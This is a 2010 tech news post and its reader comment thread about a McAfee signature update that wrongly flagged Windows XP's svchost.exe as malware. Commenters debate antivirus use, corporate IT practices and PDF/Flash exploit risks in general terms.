Linked by David Adams on Fri 23rd Apr 2010 15:58 UTC
Bugs & Viruses A version of the McAfee antivirus software used in the corporate and public sectors misidentified the svchost.exe file in Windows XP systems as malware, sending the affected machines into a loop of restarts. Only users of McAfee VirusScan Enterprise on Windows XP service pack 3 were affected, but the fallout was pretty severe, with hospital and police systems among those taken down.
Order by: Score:
Precaution
by Leroy on Fri 23rd Apr 2010 16:39 UTC
Leroy
Member since:
2006-07-06

I also don't run anti-virus at home. I find most anti-virus programs only slow the computer down and provide little protection. Best practices like yours makes the difference.

I live in Kentucky and this story hit here Tuesday. McAfee shut down most police stations, hospitals and governments. Though honestly, I couldn't tell the difference.

Reply Score: 6

RE: Precaution
by WereCatf on Fri 23rd Apr 2010 17:04 UTC in reply to "Precaution"
WereCatf Member since:
2006-02-15

I also don't run anti-virus at home. I find most anti-virus programs only slow the computer down and provide little protection. Best practices like yours makes the difference.

I have FireFox with AdBlock+, FlashBlock and NoScript addons enabled, I am careful with what I download, and I have an external firewall. Haven't had a single virus or malware infection for years now ;)

I have installed the same addons on my mother's laptop and showed her how to use them and explained a bit on good security practices, as I have always explained to all my close relatives too. None of them have had virus or malware issues for the past few years.

It's amazing how many people seem to completely lack any kind of common sense when browsing the web, taking everything there as a 150% fact, filling their details on even the most obvious scams and so on. With even just a tiny bit of explaining of good practices they could be so much safer. Unfortunately, there is no established way of easily obtaining such knowledge, even at schools they just get taught how to use Frontpage Express or how to play Quake/Farmville, and it seems most people aren't even willing to learn! I have never understood why; is it really such a bother to have to learn something useful?

Reply Score: 7

RE[2]: Precaution
by mtzmtulivu on Fri 23rd Apr 2010 17:14 UTC in reply to "RE: Precaution"
mtzmtulivu Member since:
2006-11-14


It's amazing how many people seem to completely lack any kind of common sense when browsing the web, taking everything there as a 150% fact, filling their details on even the most obvious scams and so on. With even just a tiny bit of explaining of good practices they could be so much safer. Unfortunately, there is no established way of easily obtaining such knowledge, even at schools they just get taught how to use Frontpage Express or how to play Quake/Farmville, and it seems most people aren't even willing to learn! I have never understood why; is it really such a bother to have to learn something useful?


you seem to be informed in matter of computing, are you as in formed in matters of law, medicine, history, religion, world geography, people in your community, internal workings of your own body?

not everybody can be expected to have the same amount of above average knowledge in each and every field.

Reply Score: 5

RE[3]: Precaution
by WereCatf on Fri 23rd Apr 2010 17:33 UTC in reply to "RE[2]: Precaution"
WereCatf Member since:
2006-02-15

not everybody can be expected to have the same amount of above average knowledge in each and every field.

Where did I even claim everyone should? But obviously, when it comes to computing and Internet everyone should have atleast the slightest clue as to how to surf securely yet people don't seem to be willing to learn. That is NOT the same thing as asking for them to know the inner workings of a computer or such, you know.

Reply Score: 4

RE[4]: Precaution
by Bill Shooter of Bul on Fri 23rd Apr 2010 18:07 UTC in reply to "RE[3]: Precaution"
Bill Shooter of Bul Member since:
2006-07-14

If you try running a large company without antivirus, you are an idiot. Lets assume that you are 99.9% vigilant against all threats without anti virus. That's great! You'd need to be confronted with 1000 virus attempts in order to be infected once. Maybe you'd encounter 1 attempt a month. So it may take 83 years before you get a virus, you'll probably be ok.

Now what if there are 1,000 employees who are using the same method against viruses and they also see one virus attempt a month. They'll see 1000 viruses a month, and one of them will be infected.

You need more 9s. Antivirus is an easy, cheap way to get more 9's. ( that is when it doesn't go berserk and destroy your system like mcaffee. )

Reply Score: 7

RE[5]: Precaution
by nt_jerkface on Fri 23rd Apr 2010 19:38 UTC in reply to "RE[4]: Precaution"
nt_jerkface Member since:
2009-08-26

No kidding, especially when there are employees that will do the exact opposite of what they are told out of spite or apathy.

Education is good but can't beat education and protection.

There has also been malware that got past adept users through system exploits. You don't want to be the company that is rolling out anti-virus software on the day of an outbreak.

Reply Score: 2

RE[5]: Precaution
by Leroy on Fri 23rd Apr 2010 20:30 UTC in reply to "RE[4]: Precaution"
Leroy Member since:
2006-07-06

I work for a small company and we do use anti-virus here. But guess what. It doesn't work against malware. I don't remember the last time anybody actually got a virus. Year 2000? Most of the time it's those "Anti-Virus malwares" you get when surfing the internet. Several times a week somebody gets a pop-up stating that their hard-drive is infected.

CTRL-ALT-DEL, close program.

Reply Score: 1

v RE[5]: Precaution
by StychoKiller on Fri 23rd Apr 2010 21:54 UTC in reply to "RE[4]: Precaution"
RE[6]: Precaution
by nt_jerkface on Fri 23rd Apr 2010 23:51 UTC in reply to "RE[5]: Precaution"
nt_jerkface Member since:
2009-08-26

An Id10t? Do you have pubes yet?

Reply Score: 0

RE[6]: Precaution
by Bill Shooter of Bul on Sat 24th Apr 2010 05:38 UTC in reply to "RE[5]: Precaution"
Bill Shooter of Bul Member since:
2006-07-14

Yes. But if you use anti Virus to keep you safeer you then correctly understand security is about risks and trade offs rather than absolutes.

But, yes I am talking about what to do to improve security on windows. What do I recommend to people like me? --Fedora.

Reply Score: 2

RE[3]: Precaution
by merkoth on Fri 23rd Apr 2010 18:31 UTC in reply to "RE[2]: Precaution"
merkoth Member since:
2006-09-22

you seem to be informed in matter of computing, are you as in formed in matters of law, medicine, history, religion, world geography, people in your community, internal workings of your own body?

not everybody can be expected to have the same amount of above average knowledge in each and every field.


That's why you don't see many geeks writing geography books or performing surgery. Most people, however, seem to think they can do computing tasks without knowing how to use a computer.

Unfortunately, no amount of automated tools can mitigate their lack of understanding nor common sense.

Reply Score: 5

RE[4]: Precaution
by ivanzinho on Fri 23rd Apr 2010 18:57 UTC in reply to "RE[3]: Precaution"
ivanzinho Member since:
2009-04-05

I think your comments synthesizes the overall situation.

Let's take a car as an example:
Everybody drives a car, people don't have to become an Engineer to drive a car, but they do have to get a minimum training in order to drive a car safely (and be allowed to drive at all).
While you can drive a car without any previous training, it'd be dangerous (at least until you get the hang of it).

So, no, people don't have to become geeks in order to use a computer and surf the web, but they should at least get some fairly basic training to do it safely.

Computers are complex things that do all sort of stuff and are only getting more and more used in people's daily tasks, so if they want to use them to access their bank accounts and do whatever they do with their computers, knowing how to do it in a sacure manner would, at minimum, make the web a little safer.

It's about time they start teaching Internet Safety in school instead of Microsoft Word how-tos.

Edited 2010-04-23 18:59 UTC

Reply Score: 3

RE[3]: Precaution - the bare minimum is missing
by jabbotts on Fri 23rd Apr 2010 19:01 UTC in reply to "RE[2]: Precaution"
jabbotts Member since:
2007-09-06

I don't think it's about everyone learning technology to the degree that Warecatf does but to the minimum level of understanding that mother and other relatives have. With your example, I'm not required to know biology to the degree of a doctor but there is a bare minimum required including how to feed myself. I don't require a laywer's knowledge of law but I also have a minimum knowledge needed and can't claim ignorance of the law as an excuse. My own example often said; "you don't have to become an F-1 race car pilot but you do have to learn to drive a car".

I'd suggest that most of the threats would be negated by people gaining a minimum amount of knowledge instead of simply knowing how many popups they have to click before getting to the porn shots.

Reply Score: 4

RE[3]: Precaution
by WorknMan on Fri 23rd Apr 2010 20:47 UTC in reply to "RE[2]: Precaution"
WorknMan Member since:
2005-11-13

not everybody can be expected to have the same amount of above average knowledge in each and every field.


The key word here is 'average knowledge' ... like in medicine, if you get a cut, you should at least know how to disinfect it. When it comes to computers and the Internet, most people don't even have this equivalent knowledge.

There is a big difference between knowing how to set up a firewall with custom rules and just basic stuff, like knowing not to double click on a .exe file that promises you nude pics of Megan Fox.

Reply Score: 3

RE[4]: Precaution
by Tuishimi on Sat 24th Apr 2010 07:05 UTC in reply to "RE[3]: Precaution"
Tuishimi Member since:
2005-07-06

"There is a big difference between knowing how to set up a firewall with custom rules and just basic stuff, like knowing not to double click on a .exe file that promises you nude pics of Megan Fox."

Oh crap!

Reply Score: 3

RE: Precaution
by SlackerJack on Fri 23rd Apr 2010 19:26 UTC in reply to "Precaution"
SlackerJack Member since:
2005-11-12

Someone is in for a big pay day for new OS installs after this then.

Reply Score: 2

RE: Precaution
by OSGuy on Fri 23rd Apr 2010 23:21 UTC in reply to "Precaution"
OSGuy Member since:
2006-01-01

That makes you very gullible. You can run AV software with resident protection off. This means real-time scan is disabled and will not slow down your computer.

I never used to run AV software too but it's a bad practice. It won't hurt to right-click and scan downloaded file, "just in case". Since real-time scan is turned off, I haven't noticed any slow downs.

Edited 2010-04-23 23:23 UTC

Reply Score: 2

RE[2]: Precaution
by Morgan on Sat 24th Apr 2010 04:32 UTC in reply to "RE: Precaution"
Morgan Member since:
2005-06-29

If you have a fast enough system, realtime scanning really doesn't slow you down noticeably. I know I can't tell a difference at all when I'm on XP, and I've got a mediocre Core2Duo with 2GB memory and a GeForce 8400GS. Hardly a speed demon compared to current i7 systems, but more than enough for my needs.

The exception would be for gamers who want that extra three FPS for bragging rights or whatever. If that's an issue though, Avast now has a "gamer mode" that stops the realtime scanning for you when you game.

Reply Score: 2

Finally
by pabloski on Fri 23rd Apr 2010 16:40 UTC
pabloski
Member since:
2009-09-28

someone has understood that windows is a malicious virus infesting our computers ;)

Reply Score: 6

RE: Finally
by cb88 on Fri 23rd Apr 2010 20:55 UTC in reply to "Finally"
cb88 Member since:
2009-04-23

I believe it is properly named a "backdoor"

Reply Score: 1

Why?
by darknexus on Fri 23rd Apr 2010 16:44 UTC
darknexus
Member since:
2008-07-15

Why exactly are important services, like hospitals and police, running Windows and relying on Antivirus? Yet more proof that we've got idiots in charge I guess.

Reply Score: 10

RE: Why?
by mtzmtulivu on Fri 23rd Apr 2010 17:07 UTC in reply to "Why?"
mtzmtulivu Member since:
2006-11-14

Why exactly are important services, like hospitals and police, running Windows and relying on Antivirus? Yet more proof that we've got idiots in charge I guess.

whats the alternative? solaris? :-)

the question to me is why were these computers configured to auto update? any update should first go through a process to make sure nothing breaks before being allowed to spread to all the computers in an organization.

Reply Score: 6

RE[2]: Why?
by Elv13 on Fri 23rd Apr 2010 17:19 UTC in reply to "RE: Why?"
Elv13 Member since:
2006-06-12

And it is why you pay for support and testing from them. They reality is, most of these corporate user don't have proper IT department.

The best way for them would be a network anti malware solution. Blocking them in a gateway before they are installed. Signature check can be done on packet too, not just files... (and yes, it does slow your internet connection and your intranet, but just as much as anti virus slow your computers).

Reply Score: 2

RE[2]: Why?
by darknexus on Fri 23rd Apr 2010 18:36 UTC in reply to "RE: Why?"
darknexus Member since:
2008-07-15

Well, my original comment didn't quite come across the way I'd intended, and the edit timeout bit me. I meant to stress the and, as in why are they running Windows *and* relying on Antivirus *instead* of locking the systems down? That's what the policies and mmc are for after all and, while they can be a big pain in the ass and obscure at times, they're far more effective than any Antivirus could ever be. Lock them down, then use a gateway/firewall/network-based AV solution to check traffic from the outside in. split the subnets, so that if they do have a public access point it doesn't get anywhere near the corporate environment. Lock down the browser, forbid the user to install *anything*, and do not let any existing software automatically update. These steps would eliminate the need for per-system antivirus if they really must use Windows. If they're going to secure their Windows machines, they need to do it right.

Reply Score: 4

RE[3]: Why? - more "why"
by jabbotts on Fri 23rd Apr 2010 19:34 UTC in reply to "RE[2]: Why?"
jabbotts Member since:
2007-09-06

Which leads us to the next question, why does one need to lock down the system in the first place. Why is it not delivered with services off by default and configuration hardened. Why am I turning the majority of stuff off instead of turning just what I need on?

In terms of auto-updates, was this a program patch or something delivered through Mcafee's signature updater? It seems to be a signature issue that decided svchost.exe was malicious. Antivirus is probably the one category of software that should be updating it's signature files and scanning engine automatically. This puts the responsibility on McAfee for pushing a bad signature file update.

If it was something like a bad Windows update, I'd be all over the municipality asking why they don't have compitent IT. For an AV data file update it's more understandable.

Reply Score: 2

RE[4]: Why? - more "why"
by WorknMan on Fri 23rd Apr 2010 20:49 UTC in reply to "RE[3]: Why? - more "why""
WorknMan Member since:
2005-11-13

Which leads us to the next question, why does one need to lock down the system in the first place. Why is it not delivered with services off by default and configuration hardened. Why am I turning the majority of stuff off instead of turning just what I need on?


They tried that with UAC on Vista, and we all know how well that was received.

Reply Score: 3

RE[5]: Why? - not UAC
by jabbotts on Fri 23rd Apr 2010 21:54 UTC in reply to "RE[4]: Why? - more "why""
jabbotts Member since:
2007-09-06

Much of that grief was third party software not updated to function in the Vista security model. Microsoft's choice to make UAC intentionally annoying in a hope that consumers would pressure third party developers. They could have implemented it in a better way. Even so, the default config and software installs on Windows versions.. allow all, deny none - then leave it up to the consumer to make the system safe.

Reply Score: 2

RE[4]: Why? - more "why"
by Flatland_Spider on Fri 23rd Apr 2010 22:07 UTC in reply to "RE[3]: Why? - more "why""
Flatland_Spider Member since:
2006-09-01

It was an signature update that came from McAfee.

Patch Tuesday was last week, and there haven't been anymore released for Windows clients.

McAfee DAT 5958 Update Issues
http://isc.sans.org/diary.html?storyid=8656

Reply Score: 1

RE[3]: Why?
by Bill Shooter of Bul on Fri 23rd Apr 2010 19:47 UTC in reply to "RE[2]: Why?"
Bill Shooter of Bul Member since:
2006-07-14

Even if everything you just said made sense, its still wrong. Why? HIPAA requires antivirus for all the reasons you don't understand.

Reply Score: 2

RE[2]: Why?
by cb88 on Fri 23rd Apr 2010 20:56 UTC in reply to "RE: Why?"
cb88 Member since:
2009-04-23

You really think they had a competent admin... they probably can't afford one with the politicians sucking up all the money.

Reply Score: 1

RE: Why?
by BluenoseJake on Fri 23rd Apr 2010 19:57 UTC in reply to "Why?"
BluenoseJake Member since:
2005-08-11

Never mind, your other post clarified your statements nicely

Edited 2010-04-23 20:00 UTC

Reply Score: 2

RE: Why?
by Morgan on Sat 24th Apr 2010 04:41 UTC in reply to "Why?"
Morgan Member since:
2005-06-29

Take it from someone who works for law enforcement: Local government IT is a joke. The IT managers in my county honestly think that Linux itself is a virus because their MCSE instructor told them so. A few years ago they sent out a system-wide email discouraging employees from running Avast and AVG on their home computers because "free antivirus software can damage your system and cause you to become more infected". Why the hell they cared about our home systems I'll never know, as they don't allow any sort of VPN or other connections from home users to the county network.

It's gotten so bad that Criminal Investigations and Crime Scene have their own separate networks that are not allowed to be touched by County IT; they had to do that just to be able to work without being locked down by WebSense every ten minutes.

Reply Score: 3

RE: Why?
by bousozoku on Sat 24th Apr 2010 15:24 UTC in reply to "Why?"
bousozoku Member since:
2006-01-23

Why exactly are important services, like hospitals and police, running Windows and relying on Antivirus? Yet more proof that we've got idiots in charge I guess.


Hospitals generally don't create their own software and 3270 and 5250 dumb terminals are gone, so most use Windows to access the main computer.

It's not as though the Hospital Information System is running on a Windows server, but they still need proper access to the HIS.

Reply Score: 2

Not a mistake
by fretinator on Fri 23rd Apr 2010 17:25 UTC
fretinator
Member since:
2005-07-06

Most core Windows system files are malicious!

Just a joke, Happy Friday!

Reply Score: 4

...
by Hiev on Fri 23rd Apr 2010 17:46 UTC
Hiev
Member since:
2005-09-27

This is the story of a company that doesn't test its products in every escenario.

As a software developer I can tell, it can happen to any of us.

Edited 2010-04-23 17:52 UTC

Reply Score: 3

RE: ... - in every scenario
by jabbotts on Fri 23rd Apr 2010 19:36 UTC in reply to "..."
jabbotts Member since:
2007-09-06

WindowsXP SP3 with McAfee Enterprise.

That's really not an obscure combination. I'd say it's one of six basic setups that should have been checked. Maybe there is a third factor in there that triggers the issue but that detail hasn't hit the news outlets yet it seems.

Reply Score: 2

Old News
by foldingstock on Fri 23rd Apr 2010 18:13 UTC
foldingstock
Member since:
2008-10-30

Virus scanners are notorious for false positives. It is the drawback to the 'search for what we know is bad' mentality.

I was recently at my university's computer lab working on a C++ program assignment when their Symantec scanner warned me that the program I compiled was malicious. It was a very simple program that computed and drew out a triangle based on three lengths. Nothing complex (under 400kb total) and certainly not a virus. I had named the executable based on the chapter, page, and problem I was working on. Symantec told me this was a trojan downloader and removed the executable.

False positives will always be a problem in the current antivirus market. Personally, I choose not to use antivirus and instead I simply do not install anything that does not come from a trusted source. This solution obviously won't work for everyone, though.

Reply Score: 3

which is worse: virus once or antivirus daily??
by Rugxulo on Fri 23rd Apr 2010 18:28 UTC in reply to "Old News"
Rugxulo Member since:
2007-10-09

Virus scanners are notorious for false positives.
I was recently at my university's computer lab working on a C++ program assignment when their Symantec scanner warned me that the program I compiled was malicious.


Indeed, it's very annoying to compile a program just to be told what a virus it is. (How? I wrote it!) Blame bad heuristics and overzealous AV dudes. Worse is that antivirus slows everything down badly, moreso on "old" single-core P4s. It's unbearably slow, you can't even hardly use the computer while it's running! Also, it's just not sensible to rescan the entire HD every single day, esp. when a big chunk is archives of old service packs or non-executable files, etc. Gah, so frustrating!

But malware attacks have been very strong and frequent lately, and I've noticed XP seems to be a common target. It's sad, really, that some people find it fun to hurt others for profit. :-(

Reply Score: 1

jabbotts Member since:
2007-09-06

In the days when it was about fun the tricks tended to be humorous rather than harmful. malware is big business today though and the profit motivation is far more enticing to organized crime. It's not about deriving fun but deriving profits. There are some incredible geniuses working on the criminal side and rivaled only by the incredible geniuses working the defense side.

Reply Score: 2

nt_jerkface Member since:
2009-08-26


But malware attacks have been very strong and frequent lately, and I've noticed XP seems to be a common target. It's sad, really, that some people find it fun to hurt others for profit. :-(


I've heard more cases recently of XP users being hit with malicious code through Myspace/Facebook. Hackers don't even have to look for new exploits when there are plenty of people surfing social networking sites that have updates turned off.

Reply Score: 2

Alan.L.Graham Member since:
2008-01-10

I find nearly all antivirus programs do more harm than good. The ones that cost money are huge, bloated, useless junk.

The world's best Windows antivirus program is free from Microsoft, you can download from www.microsoft.com/security_essentials.
Security Essentials (SE) is a small (yes a Microsoft program that is small!) and as close to perfect as any antivirus program I have seen. Gee, why don't they make this a standard part of Windows 7 rather than a hidden free program that you have to find and install? Well, I would guess they don't want to hurt the big-buck anti-virus businesses like McAfee and Symantec. Wake up and use the small simple fast Microsoft Windows Antivirus that works. Forget all of the others. As a double check, I run Malwarebytes over night to see if Microsoft missed anything.

Remember the ONLY way to fix any Windows problem: reinstall Windows, Microsoft Security Essentials, free registry utility apps from download.com, and all of your apps. Next time you reinstall make sure you partition your HDD into 2 partition C: for Windows and apps and D: for your files. Then next time you need to reinstall, quick format the C: drive and reinstall. All of your files are intact on the D: drive. No need to recover them from backup.

Every computer maker delivers to you one big whopping drive where you store your files together with the world's most popular computer virus ... Microsoft Windows. STUPID!

Store all of your stuff on the new D: drive and backup those files to your flash drive, NAS drive, and online. Microsoft gives you 25 GB for free on Skydrive. Just Google for "free online backup" and you see a lot.
I like humyo.com. Semi-easy to use and lots of free online disk space before they charge you.

Wouldn't it be nice to have a black net box that does all of this geek stuff for you automatically? My new start-up BlackNetBox.com (no website yet) will make a beautiful cube 3-node network computer that does everything for you (backup, virus protection, defrag, registry fixing, updates, testing, reinstalls, etc) behind the scenes silently so you always have a 3 perfect PCs working together for you. It automatically recovers from both software and hardware crashes. Hey, maybe I should call it a Mac. ;-) No, I call it the XCUBE. Stay tuned.

Reply Score: 2

WereCatf Member since:
2006-02-15

Wouldn't it be nice to have a black net box that does all of this geek stuff for you automatically? My new start-up BlackNetBox.com (no website yet) will make a beautiful cube 3-node network computer that does everything for you (backup, virus protection, defrag, registry fixing, updates, testing, reinstalls, etc) behind the scenes silently so you always have a 3 perfect PCs working together for you. It automatically recovers from both software and hardware crashes. Hey, maybe I should call it a Mac. ;-) No, I call it the XCUBE. Stay tuned.

*sniff sniff*

What's this smell..?

*sniff*

Smells like vaporware.

Reply Score: 4

Bobthearch Member since:
2006-01-27

Smells like frying SPAM.

Reply Score: 2

jabbotts Member since:
2007-09-06

Last third party testing I saw didn't put MSE too close to the top. I couldn't see if it was false positives or missed bits it had issues with. AVG, Avast and Avira all rank higher and provide free tools.

MSE is very light on resources though and not entirely ineffective. I run it on my home machine rather than fly naked. We'll see if it holds up over time.

Reply Score: 3

nt_jerkface Member since:
2009-08-26

I find nearly all antivirus programs do more harm than good. The ones that cost money are huge, bloated, useless junk.

The world's best Windows antivirus program is free from Microsoft, you can download from www.microsoft.com/security_essentials.
Security Essentials (SE)


Oh come on that is a ridiculous assertion.

Security Essentials cannot compare to something like Nod32 or Kaspersky. MSE is great for the price but does not offer the same level of protection. Try Nod32 if you want something light.

Reply Score: 2

RavinRay Member since:
2005-11-26

Remember the ONLY way to fix any Windows problem: reinstall Windows, Microsoft Security Essentials, free registry utility apps from download.com, and all of your apps.

Or if there's a malware masquerading as a core Windows system file, get down and dirty and purge it manually if need be: go to a command prompt (in safe mode if necessary), do a search for all files with the hidden, system, and read-only attributes on, then delete the culprits. And if you've got Norton Commander for Windows 95 running on XP or later, it will read NTFS partitions and display hidden files all the time.
Next time you reinstall make sure you partition your HDD into 2 partition C: for Windows and apps and D: for your files. Then next time you need to reinstall, quick format the C: drive and reinstall. All of your files are intact on the D: drive. No need to recover them from backup. Every computer maker delivers to you one big whopping drive where you store your files together with the world's most popular computer virus ... Microsoft Windows. STUPID!

Microsoft could have made this feature standard during Windows installation that if setup detects more than one hard drive it offers to put My Documents in the second drive, instead of users going out of their way to do this on their own after Windows is installed.

Reply Score: 1

Wreaked havok!
by hollovoid on Fri 23rd Apr 2010 18:53 UTC
hollovoid
Member since:
2005-09-21

This issue is still being tackled by our IT dept days later because it hit hundreds of computers all at once. I got out of it on mine because they keep the windows installation files on the computer so a quick terminal expand svchost.ex_ svchost.exe and copy to system32 / reboot got things up and running.

Reply Score: 2

Not as bad as Bit Defender
by steogede2 on Fri 23rd Apr 2010 22:02 UTC
steogede2
Member since:
2007-08-17

Did anyone see the 'Trojan.Fakealert.5' problem which affected Bit Defender (and related virus scanners) a month or so ago? Basically after updating the virus signatures, every system file was identified as malicious. Caused a lot of people a lot of problems. Thankfully Bit Defender is mainly used by home users.

Reply Score: 1

This wasn't a Patch
by Phloptical on Sat 24th Apr 2010 00:25 UTC
Phloptical
Member since:
2006-10-10

It was a daily definitions update.

I love how the ubergeeks say "simple, don't run an antivirus/windows". Yeah, that's great, you've obviously never worked a day in a corporate IT environment, and apparently never will.

Linux is not the answer. Fine for some servers/applications but by and large, most IT departments want to pay for software and support. Not for the sub-contracted hoards of geekdom to descend on the datacenter when the latest *nix server product gets a corrupt filesystem.

Running an anti-malware product is necessary because the vast majority of people are either ignorant of what they're doing on a computer, or just too damn stupid to realize that facebook isn't going to send them an attachment in an email.

</end rant>

Reply Score: 3

State of AV today
by moondino on Sat 24th Apr 2010 02:44 UTC
moondino
Member since:
2010-03-27

Buffer overflow exploits via .pdf / .swf (sometimes Java applets, but lesser so) are the current infection points. If you have Adobe Reader and Flash installed and you aren't using Firefox + NoScript, you aren't as safe as you think you are. Adblock helps a bit. NoScript helps a lot, but even that isn't perfect if the top level domain you trust gets hacked and < iframe >'s you to a malicious .pdf file that then loads up a Zeus trojan .exe that no anti-virus can detect. (Zeus toolkits dynamically generate a different .exe and cannot be proactively detected well)

Most anti-virus software today is reactive, not proactive. Only companies investing heavily in HIPS (Host Intrusion Prevention) are going to go anywhere in the future. Instead of looking inside executables, start detecting odd < iframe >s on pages, scan .pdf and .swf files for odd tags, and prevent sudden and unwanted changes to the registry from executables coming from the browser cache unless explicitly allowed.

Congrats to OSNews choosing a content / commenting system that strips the < iframe > tag, btw. Bravo.

Reply Score: 2

RE: State of AV today
by David on Sat 24th Apr 2010 03:06 UTC in reply to "State of AV today"
David Member since:
1997-10-01

We didn't choose it, we built it! :-)

And do you (or anyone else out there) know whether Chrome's sandbox would protect against the buffer overflow exploits you describe?

Reply Score: 1

RE[2]: State of AV today
by moondino on Sat 24th Apr 2010 17:38 UTC in reply to "RE: State of AV today"
moondino Member since:
2010-03-27

Well then, kudos to you guys! It's a refreshing and rare thing to see people care about sanitizing input.

I don't see Chrome's sandboxing preventing a PDF or SWF overflow from executing / accessing files, especially if the filesystem is FAT / FAT32. It all depends on how the PDF / SWF is written, and if UAC is enabled and the user is vigilant, etc.

A programmer buddy of mine who works at Kayako and now some web-based firm had a virtual machine infected, and he uses nothing but Chrome across the board. No prompts, just loaded a page with an advert and *BLAM* fake anti-virus pop-ups everywhere. Nothing that a roll-back can't cure, but it is possible and I'm not too surprised.

Open Adobe Reader RIGHT NOW and hit Edit -> Preferences. Under Internet, uncheck Display PDF in browser. Under Javascript, uncheck Enable Adobe Javascript. Congratulations, you are now much, much more secure than you were a minute ago. To go another step further, install Secunia PSI and scan your system occasionally; install any patches as needed.

I've seen every trick in the book: javascript functions that take in obfuscated text BACKWARDS to parse it into a URL, to hide the URL from AV / HIPS scanners. As soon as AV companies start to detect this kind of thing, the malware groups just add another layer. The rabbit hole goes deeper and deeper. There was one page that had functions written in ten different languages. ;)

malwaredomainlist is a great place for people to get their hands on this kind of code in the wild and experiment with it. Remember to lock your VM down if you do! I would even recommend running the Windows VM in a Linux host, just for absolute safety.

Edited 2010-04-24 17:46 UTC

Reply Score: 1

RE[3]: State of AV today
by nt_jerkface on Sat 24th Apr 2010 19:30 UTC in reply to "RE[2]: State of AV today"
nt_jerkface Member since:
2009-08-26

A programmer buddy of mine who works at Kayako and now some web-based firm had a virtual machine infected, and he uses nothing but Chrome across the board.


I can also provide a browser security anecdote:
http://arstechnica.com/security/news/2009/03/chrome-is-the-only-bro...

Disabling Javascript in Adobe Reader is good advice but I would go a step further and suggest an alternative like Foxit. Java should only be installed if absolutely needed. It's such a shame that so many websites still use Java when there are better alternatives.
http://krebsonsecurity.com/2010/04/unpatched-java-exploit-spotted-i...

Reply Score: 2

RE[4]: State of AV today
by moondino on Sat 24th Apr 2010 21:52 UTC in reply to "RE[3]: State of AV today"
moondino Member since:
2010-03-27

A quote from that link:

"the contestants are required to do this in default browser installations without plugins such as Flash or Java, which are commonly used as vectors for attacks."

So basically, not a real world situation.

Every product has security flaws... the security software / anti-virus needs to look at the choke points and protect those, instead of stupid hash detection or proactive detection that hits almost as many false positives as it does legit malware. Choke points being, the registry keys that have to be changed for a program to survive a reboot, the installation of a device driver or service, etc.

In a business environment, tell me how we are going to move thousands of users who are accustomed to Adobe Acrobat / Reader to FoxIt without training or extensive documentation, re-training of the Help Desk, etc.

To boot, FoxIt has it's own slew of security issues. There are PDFs out there that buffer overflow FoxIt as well, just scan Secunia or disclosure sites for a few examples. Security via obsecurity doesn't work in an age of targeted attacks.

I'm not trying to toot my own horn, but I used to work for a major AV security company and I'm only putting this kind of thing out there to help people be better protected. Google Chrome does have the ability to control javascript execution per site now, but you have to whitelist them manually, which is a huge pain. If you could simply right click the address bar and then choose allow top-level site, it would be manageable and I would switch from Firefox / NoScript almost immediately. With the current model, however, Firefox is easier to manage, although quite a bit slower. ;)

Edited 2010-04-24 21:59 UTC

Reply Score: 1

RE[5]: State of AV today
by WereCatf on Sun 25th Apr 2010 10:38 UTC in reply to "RE[4]: State of AV today"
WereCatf Member since:
2006-02-15

In a business environment, tell me how we are going to move thousands of users who are accustomed to Adobe Acrobat / Reader to FoxIt without training or extensive documentation, re-training of the Help Desk, etc.

In a business environment Acrobat/Acrobat Reader is the de-facto standard and it's probably really tough to try to get people to move on to something else.

But for home users I often suggest SumatraPDF. It's pretty snappy, small, and doesn't seem to suffer from the same vulnerabilities as Foxit or Acrobat, atleast not when I've tried it in a VM with an infected file. It lacks some of the capabilities of its bigger brothers, though, but it could very well be worth the small effort of trying if you know someone who only needs to read PDF files, not edit them ;)

Reply Score: 2

RE[6]: State of AV today
by darknexus on Sun 25th Apr 2010 12:46 UTC in reply to "RE[5]: State of AV today"
darknexus Member since:
2008-07-15

This is probably a dumb question, but what's to retrain in operating a PDF viewer? GO to page x, read, next page, read, fill out form, print/send... etc. I can understand maybe needing to retrain if you were to switch wordprocessors or something, but a document viewer?

Reply Score: 2

RE[6]: State of AV today
by nt_jerkface on Mon 26th Apr 2010 01:54 UTC in reply to "RE[5]: State of AV today"
nt_jerkface Member since:
2009-08-26

But for home users I often suggest SumatraPDF. It's pretty snappy, small, and doesn't seem to suffer from the same vulnerabilities as Foxit or Acrobat


I think the problem with Sumatra is that it is too light, as in missing too many features even for home users. It's like the notepad of pdf readers. As soon as they want to do something beyond reading the file they will just go and install Adobe reader. I really can't recommend it for that reason.

Reply Score: 2

RE[5]: State of AV today
by nt_jerkface on Mon 26th Apr 2010 01:36 UTC in reply to "RE[4]: State of AV today"
nt_jerkface Member since:
2009-08-26


In a business environment, tell me how we are going to move thousands of users who are accustomed to Adobe Acrobat / Reader to FoxIt without training or extensive documentation, re-training of the Help Desk, etc.


That's a fair concern for changing office suites but a pdf reader? It's not like you can do that much with a pdf.


To boot, FoxIt has it's own slew of security issues. There are PDFs out there that buffer overflow FoxIt as well,


The vast majority of pdf exploits only work with Adobe reader. It's not that I believe FoxIt to be 100% unhackable, it's more Adobe's abysmal security record.
http://www.computerworld.com/s/article/9157438/Rogue_PDFs_account_f...


Security via obsecurity doesn't work in an age of targeted attacks.


Yes it does because those attacks are often targeted at the largest targets. It just shouldn't be relied upon as a sole method of defense.

With the current model, however, Firefox is easier to manage, although quite a bit slower. ;)


I've never trusted the Mozilla code base and I think their security record in the past was more due to IE6 being an easy target. Last year Firefox had far more vulnerabilities than IE8

Despite being the most attacked browser, IE had 45 reported vulnerabilities, compared with 169 vulnerabilities reported for Firefox.

http://news.cnet.com/8301-27080_3-20002879-245.html

Reply Score: 2

Comment by ballmerlikesgoogle
by ballmerlikesgoogle on Sat 24th Apr 2010 03:38 UTC
ballmerlikesgoogle
Member since:
2009-10-23

Thank God we ditched McAfee 3 years ago, I would be pulling my hair out right about now with every user in my corp banging down my door.

I am stuck using Windows at work, for us to change to another platform such as Linux or Mac is not an option due to our software vendors. Fortunately I have one AV vendor defending my desktops and servers, and 3 other AV vendors sitting in the UTM on the perimeter, very rare we ever get anything through.

There will always be false positives in AV, but how McAfee slipped up on this one I can't even begin to imagine.

Who ever was doing the QA on that DAT needs to be shown the door, maybe he can hang the bum who worked for Apple who left the Iphone prototype in the bar because he got a little too blitzed. (They can both be scrubbing Steve Jobs's porcelin IGod....)

Reply Score: 2

RE: Comment by ballmerlikesgoogle
by funny_irony on Sat 24th Apr 2010 08:43 UTC in reply to "Comment by ballmerlikesgoogle"
funny_irony Member since:
2007-03-07

False positive is nothing new. Symantec AV crashed thousands of PC in China in year 2007 with blue screen of death.

http://www.computerworld.com/s/article/9019958/Symantec_false_posit...

